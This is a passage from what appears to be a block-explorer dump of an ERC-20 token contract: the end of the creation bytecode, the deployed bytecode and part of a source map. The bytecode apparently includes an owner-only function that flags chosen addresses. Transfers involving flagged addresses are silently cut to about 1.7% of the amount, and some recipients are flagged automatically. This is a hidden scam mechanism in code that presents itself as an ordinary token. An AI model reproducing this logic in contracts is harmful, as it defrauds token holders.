ffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b610e9d565b6001905092915050565b6000610b51610b4a610e95565b8484611091565b6001905092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c96610e95565b73ffffffffffffffffffffffffffffffffffffffff16610cb4611068565b73ffffffffffffffffffffffffffffffffffffffff1614610d0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0190611bfd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7190611b7d565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000808284610e469190611ccf565b905083811015610e8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8290611bbd565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0490611c5d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7490611b9d565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161105b9190611c7d565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611101576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f890611c3d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611171576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116890611b5d565b60405180910390fd5b600061117e84848461153c565b90506111ec8260405180606001604052806026815260200161224260269139600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061128181600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506112cf8484846115ff565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161132c9190611c7d565b60405180910390a350505050565b6000838311158290611382576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113799190611b3b565b60405180910390fd5b50828461138f9190611db0565b90509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611408576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ff90611c1d565b60405180910390fd5b6114748160405180606001604052806022815260200161222060229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506114cc8160055461170790919063ffffffff16565b600581905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115309190611c7d565b60405180910390a35050565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806115df5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156115f4576115ed82611760565b90506115f8565b8190505b9392505050565b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611702576000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b505050565b60008282111561174c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174390611bdd565b60405180910390fd5b81836117589190611db0565b905092915050565b600062066a44611b39836117749190611d56565b61177e9190611d25565b9050919050565b600081359050611794816121da565b92915050565b60008083601f8401126117ac57600080fd5b8235905067ffffffffffffffff8111156117c557600080fd5b6020830191508360208202830111156117dd57600080fd5b9250929050565b6000813590506117f3816121f1565b92915050565b60008135905061180881612208565b92915050565b60006020828403121561182057600080fd5b600061182e84828501611785565b91505092915050565b6000806040838503121561184a57600080fd5b600061185885828601611785565b925050602061186985828601611785565b9150509250929050565b60008060006060848603121561188857600080fd5b600061189686828701611785565b93505060206118a786828701611785565b92505060406118b8868287016117e4565b9150509250925092565b600080604083850312156118d557600080fd5b60006118e385828601611785565b92505060206118f4858286016117e4565b9150509250929050565b60006020828403121561191057600080fd5b600061191e848285016117e4565b91505092915050565b60008060006040848603121561193c57600080fd5b600061194a868287016117f9565b935050602084013567ffffffffffffffff81111561196757600080fd5b6119738682870161179a565b92509250509250925092565b61198881611df6565b82525050565b600061199982611cb3565b6119a38185611cbe565b93506119b3818560208601611e39565b6119bc81611f74565b840191505092915050565b60006119d4602383611cbe565b91506119df82611f85565b604082019050919050565b60006119f7602683611cbe565b9150611a0282611fd4565b604082019050919050565b6000611a1a602283611cbe565b9150611a2582612023565b604082019050919050565b6000611a3d601b83611cbe565b9150611a4882612072565b602082019050919050565b6000611a60601e83611cbe565b9150611a6b8261209b565b602082019050919050565b6000611a83602083611cbe565b9150611a8e826120c4565b602082019050919050565b6000611aa6602183611cbe565b9150611ab1826120ed565b604082019050919050565b6000611ac9602583611cbe565b9150611ad48261213c565b604082019050919050565b6000611aec602483611cbe565b9150611af78261218b565b604082019050919050565b611b0b81611e22565b82525050565b611b1a81611e2c565b82525050565b6000602082019050611b35600083018461197f565b92915050565b60006020820190508181036000830152611b55818461198e565b905092915050565b60006020820190508181036000830152611b76816119c7565b9050919050565b60006020820190508181036000830152611b96816119ea565b9050919050565b60006020820190508181036000830152611bb681611a0d565b9050919050565b60006020820190508181036000830152611bd681611a30565b9050919050565b60006020820190508181036000830152611bf681611a53565b9050919050565b60006020820190508181036000830152611c1681611a76565b9050919050565b60006020820190508181036000830152611c3681611a99565b9050919050565b60006020820190508181036000830152611c5681611abc565b9050919050565b60006020820190508181036000830152611c7681611adf565b9050919050565b6000602082019050611c926000830184611b02565b92915050565b6000602082019050611cad6000830184611b11565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611cda82611e22565b9150611ce583611e22565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611d1a57611d19611ee7565b5b828201905092915050565b6000611d3082611e22565b9150611d3b83611e22565b925082611d4b57611d4a611f16565b5b828204905092915050565b6000611d6182611e22565b9150611d6c83611e22565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611da557611da4611ee7565b5b828202905092915050565b6000611dbb82611e22565b9150611dc683611e22565b925082821015611dd957611dd8611ee7565b5b828203905092915050565b6000611def82611e02565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611e57578082015181840152602081019050611e3c565b83811115611e66576000848401525b50505050565b60006002820490506001821680611e8457607f821691505b60208210811415611e9857611e97611f45565b5b50919050565b6000611ea982611e22565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611edc57611edb611ee7565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f770000600082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6121e381611de4565b81146121ee57600080fd5b50565b6121fa81611e22565b811461220557600080fd5b50565b61221181611e2c565b811461221c57600080fd5b5056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b539f680720a75801b68b8c2ee2cb10ef3da98e93c40a178e663aa764f8fb09364736f6c63430008010033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063ab05039011610066578063ab050390146102d5578063c767885c14610305578063dd62ed3e14610335578063f2fde38b1461036557610100565b806370a082311461022757806395d89b4114610257578063a457c2d714610275578063a9059cbb146102a557610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db57806342966c681461020b57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101535780631b0d86eb14610171575b600080fd5b61010d610381565b60405161011a9190611b3b565b60405180910390f35b61013d600480360381019061013891906118c2565b610413565b60405161014a9190611b20565b60405180910390f35b61015b610431565b6040516101689190611c7d565b60405180910390f35b61018b60048036038101906101869190611927565b61043b565b005b6101a760048036038101906101a29190611873565b6107de565b6040516101b49190611b20565b60405180910390f35b6101c56108b7565b6040516101d29190611c98565b60405180910390f35b6101f560048036038101906101f091906118c2565b6108ce565b6040516102029190611b20565b60405180910390f35b610225600480360381019061022091906118fe565b610981565b005b610241600480360381019061023c919061180e565b610995565b60405161024e9190611c7d565b60405180910390f35b61025f6109de565b60405161026c9190611b3b565b60405180910390f35b61028f600480360381019061028a91906118c2565b610a70565b60405161029c9190611b20565b60405180910390f35b6102bf60048036038101906102ba91906118c2565b610b3d565b6040516102cc9190611b20565b60405180910390f35b6102ef60048036038101906102ea919061180e565b610b5b565b6040516102fc9190611b20565b60405180910390f35b61031f600480360381019061031a919061180e565b610bb1565b60405161032c9190611b20565b60405180910390f35b61034f600480360381019061034a9190611837565b610c07565b60405161035c9190611c7d565b60405180910390f35b61037f600480360381019061037a919061180e565b610c8e565b005b60606006805461039090611e6c565b80601f01602080910402602001604051908101604052809291908181526020018280546103bc90611e6c565b80156104095780601f106103de57610100808354040283529160200191610409565b820191906000526020600020905b8154815290600101906020018083116103ec57829003601f168201915b5050505050905090565b6000610427610420610e95565b8484610e9d565b6001905092915050565b6000600554905090565b610443611068565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461047a57600080fd5b60008360ff1614156105525760005b8282905081101561054c576001600360008585858181106104d3577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b90506020020160208101906104e8919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061054490611e9e565b915050610489565b506107d9565b60018360ff16141561062a5760005b82829050811015610624576000600360008585858181106105ab577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b90506020020160208101906105c0919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061061c90611e9e565b915050610561565b506107d8565b60028360ff1614156107025760005b828290508110156106fc57600160026000858585818110610683577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610698919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106f490611e9e565b915050610639565b506107d7565b60038360ff1614156107d65760005b828290508110156107d45760006002600085858581811061075b577f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b9050602002016020810190610770919061180e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806107cc90611e9e565b915050610711565b505b5b5b5b505050565b60006107eb848484611091565b6108ac846107f7610e95565b6108a78560405180606001604052806028815260200161226860289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061085d610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b610e9d565b600190509392505050565b6000600860009054906101000a900460ff16905090565b60006109776108db610e95565b8461097285600460006108ec610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b610e9d565b6001905092915050565b61099261098c610e95565b82611398565b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600780546109ed90611e6c565b80601f0160208091040260200160405190810160405280929190818152602001828054610a1990611e6c565b8015610a665780601f10610a3b57610100808354040283529160200191610a66565b820191906000526020600020905b815481529060010190602001808311610a4957829003601f168201915b5050505050905090565b6000610b33610a7d610e95565b84610b2e856040518060600160405280602581526020016122906025913960046000610aa7610e95565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b610e9d565b6001905092915050565b6000610b51610b4a610e95565b8484611091565b6001905092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c96610e95565b73ffffffffffffffffffffffffffffffffffffffff16610cb4611068565b73ffffffffffffffffffffffffffffffffffffffff1614610d0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0190611bfd565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610d7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7190611b7d565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000808284610e469190611ccf565b905083811015610e8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8290611bbd565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0490611c5d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7490611b9d565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161105b9190611c7d565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415611101576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f890611c3d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611171576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116890611b5d565b60405180910390fd5b600061117e84848461153c565b90506111ec8260405180606001604052806026815260200161224260269139600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061128181600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e3790919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506112cf8484846115ff565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161132c9190611c7d565b60405180910390a350505050565b6000838311158290611382576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113799190611b3b565b60405180910390fd5b50828461138f9190611db0565b90509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611408576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ff90611c1d565b60405180910390fd5b6114748160405180606001604052806022815260200161222060229139600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461133a9092919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506114cc8160055461170790919063ffffffff16565b600581905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516115309190611c7d565b60405180910390a35050565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806115df5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156115f4576115ed82611760565b90506115f8565b8190505b9392505050565b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611702576000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b505050565b60008282111561174c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174390611bdd565b60405180910390fd5b81836117589190611db0565b905092915050565b600062066a44611b39836117749190611d56565b61177e9190611d25565b9050919050565b600081359050611794816121da565b92915050565b60008083601f8401126117ac57600080fd5b8235905067ffffffffffffffff8111156117c557600080fd5b6020830191508360208202830111156117dd57600080fd5b9250929050565b6000813590506117f3816121f1565b92915050565b60008135905061180881612208565b92915050565b60006020828403121561182057600080fd5b600061182e84828501611785565b91505092915050565b6000806040838503121561184a57600080fd5b600061185885828601611785565b925050602061186985828601611785565b9150509250929050565b60008060006060848603121561188857600080fd5b600061189686828701611785565b93505060206118a786828701611785565b92505060406118b8868287016117e4565b9150509250925092565b600080604083850312156118d557600080fd5b60006118e385828601611785565b92505060206118f4858286016117e4565b9150509250929050565b60006020828403121561191057600080fd5b600061191e848285016117e4565b91505092915050565b60008060006040848603121561193c57600080fd5b600061194a868287016117f9565b935050602084013567ffffffffffffffff81111561196757600080fd5b6119738682870161179a565b92509250509250925092565b61198881611df6565b82525050565b600061199982611cb3565b6119a38185611cbe565b93506119b3818560208601611e39565b6119bc81611f74565b840191505092915050565b60006119d4602383611cbe565b91506119df82611f85565b604082019050919050565b60006119f7602683611cbe565b9150611a0282611fd4565b604082019050919050565b6000611a1a602283611cbe565b9150611a2582612023565b604082019050919050565b6000611a3d601b83611cbe565b9150611a4882612072565b602082019050919050565b6000611a60601e83611cbe565b9150611a6b8261209b565b602082019050919050565b6000611a83602083611cbe565b9150611a8e826120c4565b602082019050919050565b6000611aa6602183611cbe565b9150611ab1826120ed565b604082019050919050565b6000611ac9602583611cbe565b9150611ad48261213c565b604082019050919050565b6000611aec602483611cbe565b9150611af78261218b565b604082019050919050565b611b0b81611e22565b82525050565b611b1a81611e2c565b82525050565b6000602082019050611b35600083018461197f565b92915050565b60006020820190508181036000830152611b55818461198e565b905092915050565b60006020820190508181036000830152611b76816119c7565b9050919050565b60006020820190508181036000830152611b96816119ea565b9050919050565b60006020820190508181036000830152611bb681611a0d565b9050919050565b60006020820190508181036000830152611bd681611a30565b9050919050565b60006020820190508181036000830152611bf681611a53565b9050919050565b60006020820190508181036000830152611c1681611a76565b9050919050565b60006020820190508181036000830152611c3681611a99565b9050919050565b60006020820190508181036000830152611c5681611abc565b9050919050565b60006020820190508181036000830152611c7681611adf565b9050919050565b6000602082019050611c926000830184611b02565b92915050565b6000602082019050611cad6000830184611b11565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611cda82611e22565b9150611ce583611e22565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611d1a57611d19611ee7565b5b828201905092915050565b6000611d3082611e22565b9150611d3b83611e22565b925082611d4b57611d4a611f16565b5b828204905092915050565b6000611d6182611e22565b9150611d6c83611e22565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611da557611da4611ee7565b5b828202905092915050565b6000611dbb82611e22565b9150611dc683611e22565b925082821015611dd957611dd8611ee7565b5b828203905092915050565b6000611def82611e02565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611e57578082015181840152602081019050611e3c565b83811115611e66576000848401525b50505050565b60006002820490506001821680611e8457607f821691505b60208210811415611e9857611e97611f45565b5b50919050565b6000611ea982611e22565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415611edc57611edb611ee7565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f770000600082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6121e381611de4565b81146121ee57600080fd5b50565b6121fa81611e22565b811461220557600080fd5b50565b61221181611e2c565b811461221c57600080fd5b5056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b539f680720a75801b68b8c2ee2cb10ef3da98e93c40a178e663aa764f8fb09364736f6c63430008010033

Deployed Bytecode Sourcemap

80:1262:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2020:89:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2880:166;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2309:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;303:794:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4095:317:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2214:89;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5555:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;228:69:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2426:125:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2115:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4899:266;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3456:172;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1221:119:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1103:112;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3104:149:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2349:240:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2020:89:0;2065:13;2097:5;2090:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2020:89;:::o;2880:166::-;2963:4;2979:39;2988:12;:10;:12::i;:::-;3002:7;3011:6;2979:8;:39::i;:::-;3035:4;3028:11;;2880:166;;;;:::o;2309:106::-;2370:7;2396:12;;2389:19;;2309:106;:::o;303:794:1:-;411:7;:5;:7::i;:::-;397:21;;:10;:21;;;388:32;;;;;;444:1;435:5;:10;;;431:660;;;466:9;461:122;485:12;;:19;;481:1;:23;461:122;;;564:4;529:15;:32;545:12;;558:1;545:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;529:32;;;;;;;;;;;;;;;;:39;;;;;;;;;;;;;;;;;;506:3;;;;;:::i;:::-;;;;461:122;;;;431:660;;;612:1;603:5;:10;;;599:492;;;634:9;629:123;653:12;;:19;;649:1;:23;629:123;;;732:5;697:15;:32;713:12;;726:1;713:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-